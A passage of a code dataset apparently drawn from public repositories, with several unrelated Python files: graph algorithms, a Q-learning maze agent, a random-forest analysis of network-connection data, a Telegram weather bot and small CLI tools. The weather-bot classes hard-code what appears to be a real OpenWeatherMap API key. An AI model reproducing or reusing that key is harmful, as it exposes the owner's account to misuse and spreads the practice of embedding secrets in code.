if(not isinstance(order, int)):\n raise TypeError('unsupported type: '+str(type(order)))\n if init == None:\n init = self.val\n\n lag_atom = copy.deepcopy(self)\n lag_atom.val = init\n lag_atom.order -= order\n\n return lag_atom\n\n def next(self, order, init = None):\n '''Generate a new atom represents the next of self by order'''\n return self.lag(-order, init)\n\n def gradient(self, var):\n '''Overload the grad method in Operator'''\n if var == str(self):\n\n return Constant('', 1)\n\n else:\n return Constant('', 0)\n\n\n\n\n\nif __name__ == '__main__':\n\n a = Variable('a', 3)\n b = Atom('b', 2)\n c = Atom('c', 5)\n d = Constant('x', 2 )\n # m = -c - (c + b) * (a * c) * (b + c) / a\n m = exp(a + b)\n\n # x = exp(b)\n\n # print(m.val)\n print(m.gradient('a'))\n print(m)\n","sub_path":"dsyspy/dsyspy/dsyspy/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":11730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"435707854","text":"# Python3 program to implement\n# the above approach\n\n# Function to insert vertices \n# to adjacency list\ndef insert(adj, u, v):\n\n # Insert a vertex v to vertex u\n adj[u].append(v)\n return\n\n# Function to display adjacency list\ndef printList(adj, V):\n \n for i in range(V):\n print(i, end = '')\n \n for j in adj[i]:\n print(' --> ' + str(j), end = '')\n \n print()\n \n print()\n \n# Function to convert adjacency\n# list to adjacency matrix\ndef convert(adj, V):\n\n # Initialize a matrix\n matrix = [[0 for j in range(V)] \n for i in range(V)]\n \n for i in range(V):\n for j in adj[i]:\n matrix[i][j] = 1\n \n return matrix\n\n# Function to display adjacency matrix\ndef printMatrix(adj, V):\n \n for i in range(V):\n for j in range(V):\n print(adj[i][j], end = ' ')\n \n print()\n \n print()\n \n# Driver code\nif __name__=='__main__':\n TI =5\n NS = 5\n V = TI\n SI = [['2', '0', 'rue-de-londres', '1'], ['0', '1', 'rue-d-amsterdam', '1'], ['3', '1', 'rue-d-athenes', '1'], ['2', '3', 'rue-de-rome', '2'], ['1', '2', 'rue-de-moscou', '3']]\n adjList = [[] for i in range(V)]\n\n # Inserting edges\n for i in range(NS):\n insert(adjList, int(SI[i][0]), int(SI[i][1]))\n i+=1\n # Display adjacency list\n print(\"Adjacency List: \")\n printList(adjList, V)\n\n # Function call which returns\n # adjacency matrix after conversion\n adjMatrix = convert(adjList, V)\n\n # Display adjacency matrix\n print(\"Adjacency Matrix: \")\n printMatrix(adjMatrix, V)\n\n# This code is contributed by rutvik_56\n","sub_path":"ada.py","file_name":"ada.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"135327879","text":"from collections import deque\n\nt = int(input())\n\ndef topology_sort():\n num_same_degree = [0] *(m+1)\n order = [0] * (m+1)\n que = deque()\n ans = 0\n\n for i in range(1,len(in_degree)):\n #들어오는 차수가 0인 노드는 강의 근원\n if in_degree[i] == 0:\n que.append(i)\n #순서\n order[i] = 1\n #i로 들어오는 in_degree개수\n num_same_degree[i] += 1\n \n while que:\n cur = que.popleft()\n #cur로 들어오는 in_degree 개수가 2개 이상이면 순서 +1\n if num_same_degree[cur] >= 2:\n order[cur] += 1\n ans = max(ans, order[cur])\n\n #현재 노드와 연결되어 있는 주변노드 방문\n for adj in graph[cur]:\n \n #cur-> adj로 가는 노드의 수를 제외한다\n in_degree[adj] -= 1\n\n if in_degree[adj] == 0:\n #adj로 가는 모든 간선을 확인하였으므로 \n #이제 adj를 확인하기 위해 큐에 삽입한다\n que.append(adj)\n \n #현재노드와 adj 노드의 order같으면 같은 order의 개수를 증가\n if order[cur] == order[adj]:\n num_same_degree[adj] += 1\n #더 큰 순서를 가진 것으로 증가 \n #adj가 더 크면 num_same_degree는 유지\n #새로운 경로인 cur-> adj가 더 크면, order를 업데이트해주고\n #num_same_degree 수를 1로 초기화한다.\n elif (order[adj] < order[cur]):\n order[adj] = order[cur]\n num_same_degree[adj] = 1\n return ans\n\n\n\nfor T in range(t):\n k, m, p = map(int,input().split())\n graph = [ [] for _ in range(m+1) ]\n in_degree = [0] * (m+1) \n \n for _ in range(p):\n fr, to = map(int,input().split())\n graph[fr].append(to)\n in_degree[to] += 1\n \n max_value = topology_sort()\n print(T+1, max_value)\n","sub_path":"3.beakjoon/jungle/practice/그래프/9470_Strahler.py","file_name":"9470_Strahler.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336175285","text":"import peewee\r\nfrom pyowm import OWM\r\nimport datetime\r\nfrom telebot.types import ReplyKeyboardMarkup\r\n\r\ndatabase = peewee.SqliteDatabase(\"database.db\")\r\n\r\n\"\"\"\r\n\r\nКлассы, отвечающие за поля в таблицах\r\n\r\n\"\"\"\r\n\r\n\r\nclass Users(peewee.Model):\r\n id = peewee.IntegerField()\r\n telephone = peewee.CharField()\r\n hobbies = peewee.CharField()\r\n first_name = peewee.CharField()\r\n last_name = peewee.CharField()\r\n reputation = peewee.IntegerField()\r\n latitude = peewee.FloatField()\r\n longitude = peewee.FloatField()\r\n weather = peewee.IntegerField()\r\n weather_time = peewee.TimeField()\r\n fun = peewee.CharField()\r\n\r\n class Meta:\r\n database = database\r\n\r\n\r\nclass Reminder(peewee.Model):\r\n id = peewee.IntegerField()\r\n time = peewee.TimeField()\r\n text = peewee.CharField()\r\n date = peewee.DateTimeField()\r\n\r\n class Meta:\r\n database = database\r\n\r\n\r\nclass Events(peewee.Model):\r\n id = peewee.IntegerField()\r\n date = peewee.DateField()\r\n time = peewee.TimeField()\r\n text = peewee.CharField()\r\n count = peewee.IntegerField()\r\n fun = peewee.CharField()\r\n creator = peewee.IntegerField()\r\n members = peewee.CharField()\r\n status = peewee.IntegerField()\r\n address = peewee.CharField()\r\n\r\n class Meta:\r\n database = database\r\n\r\n\r\nclass Emoji:\r\n \"\"\"\r\n\r\n Класс Emoji создан для наглядного отображения символов,\r\n которые меняются взависимости от погодных условий\r\n\r\n \"\"\"\r\n def __init__(self):\r\n self.pictures = {\r\n 'смех': '😂',\r\n 'палец': '👍',\r\n 'солнце': '☀',\r\n 'подмигивание': '😉',\r\n 'туча1': '🌤',\r\n 'туча2': '⛅',\r\n 'туча3': '🌥',\r\n 'дождь1': '🌦',\r\n 'туча5': '☁',\r\n 'дождь2': '🌧',\r\n 'гроза1': '⛈',\r\n 'гроза2': '🌩',\r\n 'снег': '🌨',\r\n 'грусть': '😞',\r\n 'улыбка': '😀',\r\n 'улыбка1': '😊',\r\n 'пальто': '🧥',\r\n 'перчатки': '🧤',\r\n 'зонт': '☂'\r\n }\r\n\r\n def weather(self, text):\r\n if text == 'Clouds':\r\n return '☁'\r\n elif text == 'Clear':\r\n return '☀'\r\n elif text == 'Snow':\r\n return '🌨'\r\n elif text == 'Thunderstorm':\r\n return '⛈'\r\n elif text == 'Drizzle':\r\n return '🌨'\r\n elif text == 'Rain':\r\n return '🌧'\r\n else:\r\n return ''\r\n\r\n\r\nclass Words:\r\n def __init__(self):\r\n file = open('welcome_words.txt')\r\n file1 = open('farewell_words.txt')\r\n self.welcome = file.readlines()\r\n self.leave = file1.readlines()\r\n\r\n\r\nclass Bot_settings:\r\n \"\"\"\r\n\r\n Класс для хранилища временных данных\r\n\r\n \"\"\"\r\n def __init__(self):\r\n self.action = dict()\r\n for i in Users.select(): # инициализация action для всех сохранённых пользователей в DB\r\n self.action[i.id] = 'answer'\r\n self.file = open('event_categories.txt')\r\n self.lines = self.file.readlines()\r\n self.current_shown_dates = {}\r\n self.date = datetime.date(1, 1, 1)\r\n self.words = Words()\r\n self.emoji = Emoji()\r\n self.time = ''\r\n self.owm = OWM('ed0a22544e011704dca2f50f3399864f', language=\"ru\")\r\n self.keyboard = ReplyKeyboardMarkup()\r\n\r\n def weather_text(self, latitude, longitude):\r\n \"\"\"\r\n\r\n Функция получает погоду через API и формирует текст для отправки сообщения\r\n\r\n \"\"\"\r\n obs = self.owm.weather_at_coords(latitude, longitude)\r\n w = obs.get_weather()\r\n wind = w.get_wind()\r\n temp = w.get_temperature(unit='celsius')\r\n text = '☂⛅\\nСегодня {} {} \\nТемпература воздуха: {}°C\\nВетер будет достигать {} м/с\\n'.format(\r\n w.get_detailed_status(),\r\n self.emoji.weather(\r\n w.get_status()),\r\n round(temp['temp']),\r\n round(wind['speed']))\r\n if w.get_status() == 'Rain' and round(temp['temp']) < 0:\r\n text += \"Рекомендую тебе взять зонтик и одеться по теплее {}{}{}\".format(self.emoji.pictures['зонт'],\r\n self.emoji.pictures['пальто'],\r\n self.emoji.pictures['перчатки'])\r\n elif w.get_status() == 'Rain':\r\n text += \"Рекомендую тебе взять зонтик {}\".format(self.emoji.pictures['зонт'])\r\n elif round(temp['temp']) < 0:\r\n text += \"Рекомендую тебе одеться по теплее {}{}\".format(self.emoji.pictures['пальто'],\r\n self.emoji.pictures['перчатки'])\r\n return text\r\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"285257661","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 2 19:32:22 2017\r\n\r\n@author: Venkatesh\r\n\"\"\"\r\nimport pandas\r\nimport numpy as np\r\n#from math import sqrt \r\nfrom pandas import Series\r\nfrom sklearn.cross_validation import train_test_split \r\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier \r\nfrom sklearn.tree import DecisionTreeClassifier\r\n#from sklearn.metrics import explained_variance_score, mean_absolute_error, mean_squared_error\r\n#from sklearn.utils import check_array\r\nfrom sklearn.grid_search import GridSearchCV\r\n#from sklearn.model_selection import cross_val_score\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn import preprocessing \r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/capsule8.csv\")\r\ndf1 = pandas.read_excel(\"C:/Users/user/Desktop/Drchen/Cap8/cap8.xlsx\")\r\ndf2 = pandas.read_excel(\"C:/Users/user/Desktop/Drchen/Cap8/tcp_life.xlsx\")\r\n\r\nx = Series.from_array(df['ts'])\r\ny = Series.from_array(df['depth'])\r\n#binwidth = 200\r\n\r\n# 1.time-series & histogram for ts\r\nx.hist()\r\nx.plot()\r\n\r\n#time-series & histogram for depth\r\ny.hist()\r\nplt.plot(x,y)\r\n\r\nplot_1 = plt.plot(df['ts'])\r\nplot_2 = plt.plot(df['ts'],df['depth'])\r\n\r\n#time - series & histogram for rate_1 & rate_5\r\ndf1['rate_1']=np.nan\r\ndf1['rate_5']=np.nan\r\nfor i in range(0, len(df1['rates'])):\r\n for j in eval(df1['rates'][i]):\r\n if j == '1': \r\n df1['rate_1'][i] = (eval(df1['rates'][i])[j])\r\n else:\r\n df1['rate_5'][i] = (eval(df1['rates'][i])[j])\r\n\r\nplot_3 = plt.plot(df1['ts'],df1['rate_1'])\r\nplot_4 = plt.plot(df1['ts'],df1['rate_5'])\r\n\r\ndf1['rate_1'].hist()\r\ndf1['rate_5'].hist()\r\n\r\n# 3. time-series & histogram for rx and tx\r\nplot_5 = plt.plot(df2['ts'],df2['rx'])\r\nplot_6 = plt.plot(df2['ts'],df2['tx']) \r\n\r\ndf2['rx'].hist()\r\ndf2['tx'].hist()\r\n\r\n#time-series & histogram for dur\r\nplot_7 = plt.plot(df2['ts'],df2['dur'])\r\ndf2['dur'].hist()\r\n#df2['dur'].hist(bins=np.arange(min(df2['dur']), max(df2['dur']) + binwidth, binwidth))\r\n\r\n#time-series & histogram for lport & rport\r\nplot_8 = plt.plot(df2['ts'],df2['lport'])\r\nplot_9 = plt.plot(df2['ts'],df2['rport'])\r\n\r\ndf2['lport'].hist()\r\ndf2['rport'].hist()\r\n\r\nSeries.from_array(df2['dur']).plot(kind='kde')\r\n#plot_10 = plt.vlines(df2['dur'].mean(),ymin=0,ymax=0.0025,linewidth=2.0)\r\n#plot_11 = plt.vlines(df2['dur'].median(),ymin=0,ymax=0.0025,linewidth=2.0,color=\"red\")\r\n\r\ndf3 = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/dur1.csv\")\r\ndf4 = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/dur2.csv\")\r\ndf5 = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/dur3.csv\")\r\n\r\n#df3['dur1'].hist(bins=np.arange(min(df3['dur1']), max(df3['dur1']) + binwidth, binwidth))\r\ndf3['dur1'].hist()\r\ndf4['dur2'].hist()\r\ndf5['dur3'].hist()\r\n\r\n\r\ndf2['dur'].describe()\r\n\r\nupper = 226.797500\r\nlower = 85.512500\r\nIQ = upper - lower\r\n\r\nlower_inner_fence = lower - 1.5*(IQ)\r\nupper_inner_fence = upper + 1.5*(IQ)\r\nlower_outer_fence = lower - 3.0*(IQ)\r\nupper_outer_fence = upper + 3.0*(IQ)\r\n\r\n\r\ndf2['dur'].plot.box(vert = False)\r\nplt.show()\r\n\r\n\r\n#Data Modelling \r\ndf2['443'] = np.nan #extracting values of histoports 443 & 80\r\ndf2['80'] = np.nan\r\nfor i in range(0, len(df2['histoports'])):\r\n x = eval(df2['histoports'][i])\r\n x = x[1]\r\n df2['443'][i] = x['443']\r\n df2['80'][i] = x['80']\r\n\r\ndf2.to_csv('model.csv', encoding='utf-8') \r\n\r\nmodel_dataset = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/model.csv\")\r\nmodel_dataset['rport'] = model_dataset['rport'].astype(str)\r\nmodel_dataset['lport'] = model_dataset['lport'].astype(str)\r\nmodel_dataset['predquality'] = model_dataset['predquality'].astype(str)\r\n\r\nrandom_forest_model = RandomForestRegressor(random_state=0)\r\nX = model_dataset.iloc[:,1:9]\r\nY = model_dataset.iloc[:,0]\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split( X, Y, test_size = 0.3)\r\n\r\n\r\nparam_grid = {'n_estimators': [17, 18, 19, 20, 22, 23, 25], \r\n 'max_depth': [10, 11, 12, 13, 14, 15], \r\n }\r\n\r\ngrid_clf = GridSearchCV(random_forest_model, param_grid, cv = 10)\r\ngrid_clf1 = GridSearchCV(random_forest_model, param_grid, cv = 5)\r\ngrid_clf2 = GridSearchCV(random_forest_model, param_grid, cv = 3)\r\n\r\ndef mape(y_pred,y_true):\r\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\r\n \r\ngrid_clf.fit(X_train, Y_train) #fitting training on 10 fold gridCV\r\ngrid_clf.best_estimator_\r\ngrid_clf.best_params_\r\ngrid_clf.best_score_\r\n\r\ngrid_clf.score(X_train, Y_train)\r\ngrid_clf.score(X_test, Y_test)\r\n\r\n\r\ntemp2 = grid_clf.predict(X_train) #predicting in-sample for 10 fold gridCV \r\ntemp = grid_clf.predict(X_test) #predicting out-sample for 10 fold gridCV\r\nmape(Y_train.values, temp2)\r\nmape(Y_test.values, temp)\r\n\r\n#insample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, temp2, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, temp, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n\r\ngrid_clf1.fit(X_train, Y_train) #fitting training on 5 fold gridCV\r\ngrid_clf1.best_estimator_\r\ngrid_clf1.best_params_\r\ngrid_clf1.best_score_\r\n\r\ngrid_clf1.score(X_train, Y_train)\r\ngrid_clf1.score(X_test, Y_test)\r\n\r\ntemp3 = grid_clf1.predict(X_train)\r\ntemp1 =grid_clf1.predict(X_test)\r\nmape(Y_train.values, temp3)\r\nmape(Y_test.values, temp1)\r\n\r\n#insample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, temp3, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, temp1, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n\r\n\r\ngrid_clf2.fit(X_train, Y_train) #fitting training on 3 fold gridCV\r\ngrid_clf2.best_estimator_\r\ngrid_clf2.best_params_\r\ngrid_clf2.best_score_\r\n\r\ngrid_clf2.score(X_train, Y_train)\r\ngrid_clf2.score(X_test, Y_test)\r\n\r\ntemp5 = grid_clf2.predict(X_train)\r\ntemp4 =grid_clf2.predict(X_test)\r\nmape(Y_train.values, temp5)\r\nmape(Y_test.values, temp4)\r\n\r\n#insample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, temp5, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, temp4, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n''' some other stuffs that i tried\r\npca = PCA(n_components=2)\r\npca1 = PCA(n_components=3)\r\npca2 = PCA(n_components=4)\r\n\r\nstandardized_X = preprocessing.scale(X)\r\npca.fit(standardized_X)\r\npca1.fit(standardized_X)\r\npca2.fit(standardized_X)\r\n\r\n\r\npca.explained_variance_ratio_\r\npca1.explained_variance_ratio_\r\npca2.explained_variance_ratio_\r\n\r\nX1 = pca.fit_transform(standardized_X)\r\nX2 = pca1.fit_transform(standardized_X)\r\nX3 = pca2.fit_transform(standardized_X)\r\n\r\nX1_train, X1_test = train_test_split( X1, test_size = 0.1)\r\nX2_train, X2_test = train_test_split( X2, test_size = 0.1)\r\nX3_train, X3_test = train_test_split( X3, test_size = 0.1)\r\n\r\npandas.DataFrame(X1)\r\npandas.DataFrame(X2)\r\npandas.DataFrame(X3)\r\n\r\n\r\nreg1 = random_forest_model.fit(X1_train, Y_train)\r\nmodel1_out = reg1.predict(X1_test)\r\nreg1.score(X1_train, Y_train)\r\nreg1.score(X1_test,Y_test) \r\n\r\nreg2 = random_forest_model.fit(X_train.iloc[:,[2,3,6,7,1,4,5]], Y_train)\r\nmodel2_out = reg2.predict(X_test.iloc[:,[2,3,6,7,1,4,5]])\r\nreg2.score(X_train.iloc[:,[2,3,6,7,1,4,5]], Y_train) \r\nreg2.score(X_test.iloc[:,[2,3,6,7,1,4,5]],Y_test)\r\n\r\n\r\nreg3 = random_forest_model.fit(X_train.iloc[:,[0,2,3,6,7,1,4,5]], Y_train)\r\nmodel3_out = reg3.predict(X_test.iloc[:,[0,2,3,6,7,1,4,5]])\r\nreg3.score(X_train.iloc[:,[0,2,3,6,7,1,4,5]], Y_train) \r\nreg3.score(X_test.iloc[:,[0,2,3,6,7,1,4,5]],Y_test)\r\n\r\nreg4 = random_forest_model.fit(X2_train, Y_train)\r\nmodel4_out = reg1.predict(X2_test)\r\nreg4.score(X2_train, Y_train)\r\nreg4.score(X2_test,Y_test)\r\n\r\nreg5 = random_forest_model.fit(X3_train, Y_train)\r\nmodel4_out = reg1.predict(X3_test)\r\nreg4.score(X3_train, Y_train)\r\nreg4.score(X3_test,Y_test)\r\n\r\nreg2 = random_forest_model.fit(X_train.iloc[:,[2,3,1,4,5]], Y_train)\r\nmodel2_out = reg2.predict(X_test.iloc[:,[2,3,1,4,5]])\r\nreg2.score(X_train.iloc[:,[2,3,1,4,5]], Y_train) \r\nreg2.score(X_test.iloc[:,[2,3,1,4,5]],Y_test)\r\n#explained_variance_score(model1_out, Y_test)\r\n#explained_variance_score(model2_out, Y_test) \r\n#z = random_forest_model.predict(model_dataset.iloc[841:943,[1,2,4]])\r\n'''\r\n\r\n#fitting random forest only with ts\r\nreshaped_features = X_train.iloc[:,3].values.reshape(-1 ,1)\r\nreshaped_features_test = X_test.iloc[:,3].values.reshape(-1 ,1)\r\n\r\nrandom_forest_model.fit(reshaped_features, Y_train)\r\nrandom_forest_model.score(reshaped_features, Y_train)\r\nrandom_forest_model.score(reshaped_features_test, Y_test)\r\n\r\n\r\ntrain_predict = random_forest_model.predict(reshaped_features) \r\ntest_predict = random_forest_model.predict(reshaped_features_test) \r\nmape(Y_train.values, train_predict)\r\nmape(Y_test.values, test_predict)\r\n\r\n#insample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, train_predict, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, test_predict, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"Cap8.py","file_name":"Cap8.py","file_ext":"py","file_size_in_byte":9967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196669053","text":"import numpy\nfrom package.framework.sensor import Sensor\n\nclass Agent:\n mov = None # Movement module\n qrl = None # Q Reinforcement Learning module\n exp = None # Exploration module\n sen = None # Sensor module\n\n # variable how to select next action\n action_selection = 'Greedy'\n\n def __init__(self, agent_id, maze_size, configuration):\n # dict which stores information about the agent\n self.info = dict()\n self.info['id'] = agent_id\n self.tau = 0.1\n self.config = configuration\n self.maze_shape = (maze_size[0], maze_size[1])\n\n self.step_counter = 0\n self.trial_counter = 0\n\n # some logged data variables\n self.history = []\n self.expertness_history = []\n self.steps_per_trial = []\n self.agent_list = [] # list of all agentcontroller\n\n # init traveled map\n self.traveled_map = numpy.zeros(maze_size, dtype=numpy.float) # map to store already visited locations\n self.traveled_map[:, 0, 0] = 1\n self.traveled_map[:,-1,0] = 1\n self.traveled_map[0,:,0] = 1\n self.traveled_map[-1,:,0] = 1\n\n # position variables\n self.current_position = None\n self.goal_position = None\n self.start_position = None\n\n self.one_action_per_step = False\n\n def init_modules(self, mov, qrl, exp):\n self.mov = mov\n self.qrl = qrl\n self.exp = exp\n self.sen = Sensor()\n\n self.mov.init_agent_modules(self)\n self.qrl.init_agent_modules(self)\n self.exp.init_agent_modules(self)\n\n self.qrl.init_reward_matrix(self.maze_shape)\n\n def run(self):\n if self.goal_reached(): # check if we reached the goal\n return True, self.current_position # return True because current position is goal position\n\n self.step_counter += 1\n\n self.add_current_position_to_history()\n\n action_list = self.qrl.get_action_list(self.mov.get_state(self.current_position), self.tau, self.action_selection) # get action list from Q matrix\n\n # override action_list if we do exploration\n if self.do_exploration():\n action_list = self.exp.get_action_list()\n\n # check actions and get next position and reward\n for action in action_list:\n # get next position\n next_position = self.mov.get_next_position(self.current_position, action) # get target position\n\n # check if we can move to next position\n if self.mov.check_action(self.current_position, action, next_position, self.sen): # check action if no obstacle is in the way\n self.move(action, next_position) # move to new location and get reward\n break # do not check any further actions in action_list\n else:\n self.stay(action, next_position) # stay and get reward\n break\n #if self.one_action_per_step:\n # self.step_counter += 1\n # break\n\n self.expertness_history.append(self.qrl.expertness)\n\n if self.goal_reached():\n self.steps_per_trial.append(self.step_counter)\n\n return False, self.current_position\n\n def move(self, action, next_position):\n # step reward as default\n use_reward_matrix = self.config.get('use_reward_matrix', 0)\n if use_reward_matrix:\n reward = self.qrl.reward_matrix[next_position[0], next_position[1]]\n else:\n reward = self.qrl.reward_step\n\n # check if goal position\n if [next_position[0], next_position[1]] in self.goal_position: # check if target is goal\n reward = self.qrl.reward_goal\n\n # update Q matrix\n self.qrl.update_Q_mat(action,\n self.mov.get_state(self.current_position),\n self.mov.get_state(next_position),\n reward) # update q with reward step\n\n # update expertness\n self.qrl.expertness = self.qrl.expertness_modul.update_expertness(self)\n\n # set current position to next position\n self.current_position = next_position\n\n def stay(self, action, next_position):\n # wall reward as default\n reward = self.qrl.reward_wall\n\n # check if robot at next position\n if self.robot_at_position(next_position):\n return 0\n # reward = self.qrl.reward_robot\n\n # update Q matrix\n self.qrl.update_Q_mat(action,\n self.mov.get_state(self.current_position),\n self.mov.get_state(next_position),\n reward) # update q with reward wall\n\n # update expertness\n self.qrl.expertness = self.qrl.expertness_modul.update_expertness(self)\n\n def goal_reached(self): # function to determine if goal is reached\n if [self.current_position[0], self.current_position[1]] in self.goal_position:\n return True\n return False\n\n def add_current_position_to_history(self):\n self.traveled_map[self.current_position[0], self.current_position[1], 0] = 1\n self.history.append([self.current_position[0], self.current_position[1]]) # add old position to history\n\n def do_exploration(self):\n if numpy.random.random_sample(1) < self.exp.get_exploration_rate(self.trial_counter):\n return True\n else:\n return False\n\n def robot_at_position(self, position):\n is_robot = False\n for agent in self.agent_list: # check if robot\n if position[0] == agent.current_position[0] and position[1] == agent.current_position[1]:\n is_robot = True\n break\n return is_robot\n\n def reset(self, start, goal): # reset robot start and goal coordinates\n self.current_position = start\n self.goal_position = goal\n self.step_counter = 0\n self.trial_counter += 1\n self.traveled_map = numpy.zeros(numpy.shape(self.traveled_map), dtype=numpy.float) # map to store already visited locations\n self.traveled_map[:, 0, 0] = 1\n self.traveled_map[:, -1, 0] = 1\n self.traveled_map[0, :, 0] = 1\n self.traveled_map[-1, :, 0] = 1\n self.qrl.expertness = 0 # reset expertness after each trial?\n","sub_path":"src/package/framework/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652922840","text":"__all__ = ['pipeline']\n\nimport pandas as pd\nimport numpy as np\nfrom tools import sizeof_file\n\nclass Define():\n def __init__(self, data_path,data_name):\n\n self.data_path = data_path\n self.data_name = data_name\n self.response = 'pickups'\n\n self.n_features = None\n self.describe = None\n self.samples = None\n self.size = None\n self.data = None\n self.X = None\n self.y = None\n\n def pipeline(self):\n self.read()\n self.description()\n\n return self\n\n def read(self):\n self.head_y = None\n self.count = None\n try:\n if self.data_path is not None:\n self.data = pd.read_csv(self.data_path).round(3)\n self.X = self.data.loc[:, self.data.columns != self.response]\n self.X = self.X[[\"hora_num\",\"hora_cos\",\"hora_sin\", \"dia_num\",\"dia_cos\",\"dia_sin\",\"fin_semana\",\"latitud\",\"longitud\"]]\n self.y = self.data.loc[:, self.data.columns == self.response]\n self.y = np.ravel(self.y)\n except:\n print(\"Error reading\")\n\n def description(self):\n self.n_features = len(self.data.columns)-1\n self.samples = len(self.data)\n self.size = sizeof_file(self.data_path)\n\n self.describe = [self.data_name.replace(\".csv\",\"\"), self.n_features, self.samples, self.size]\n self.describe = pd.DataFrame([self.describe], columns = [\"name\",\"n_features\",\"samples\",\"size\"])\n return self.describe\n","sub_path":"TrafficPrediction-Dash/define.py","file_name":"define.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"575527695","text":"\"\"\"Main program entrypoint for the eso pledge tracker\"\"\"\nimport argparse\nimport sys\nfrom .ept_functions import handle_list, handle_next, handle_date\n\n\ndef main():\n \"\"\"Main method to parse arguments.\n If --help or --version are chosen, they will take precedence over all else\n and the program will terminate after handling them.\"\"\"\n parsed_args = parse_args(sys.argv[1:])\n if parsed_args.debug:\n print(vars(parsed_args))\n\n if parsed_args.list:\n handle_list(parsed_args.verbose)\n elif parsed_args.next:\n handle_next(parsed_args.next, parsed_args.verbose)\n else:\n handle_date(parsed_args.date, parsed_args.verbose)\n\n\ndef parse_args(args):\n \"\"\"Defines the argument parser\"\"\"\n parser = argparse.ArgumentParser(\n prog=\"ESO Pledge Tracker\",\n description=\n \"A simple CLI program to print information about Undaunted Pledges in ESO.\"\n )\n\n # optional arguments have a dash in the argument name\n parser.add_argument(\n \"-d\",\n \"--date\",\n type=int,\n help=\n (\"The default command if none are specified. Print the dungeons for \"\n \"before or after today's date(e.g. -1 is yesterday, 1 is tomorrow). \"\n \"If no arguments are specified, default to the current date.\"),\n default=0,\n metavar=\"\")\n parser.add_argument(\n \"-l\",\n \"--list\",\n help=\n (\"List all of the undaunted pledges (and their dungeon sets with verbose), \"\n \"starting with the current dungeon for each cycle.\"),\n action=\"store_true\")\n parser.add_argument(\"-v\",\n \"--verbose\",\n help=\"Make the output more verbose.\",\n action=\"store_true\")\n parser.add_argument(\n \"-n\",\n \"--next\",\n help=\"Get the next time a dungeon or dungeon set is available.\",\n metavar=\"\")\n # added for the fun of it, version numbers are currently meaningless\n parser.add_argument(\"--version\",\n action=\"version\",\n version=\"%(prog)s 0.1.0\")\n parser.add_argument(\n \"--debug\",\n action=\"store_true\",\n help=\"Print the argument parser's argv values for debugging purposes.\")\n\n return parser.parse_args(args)\n\n\nif __name__ == '__main__':\n 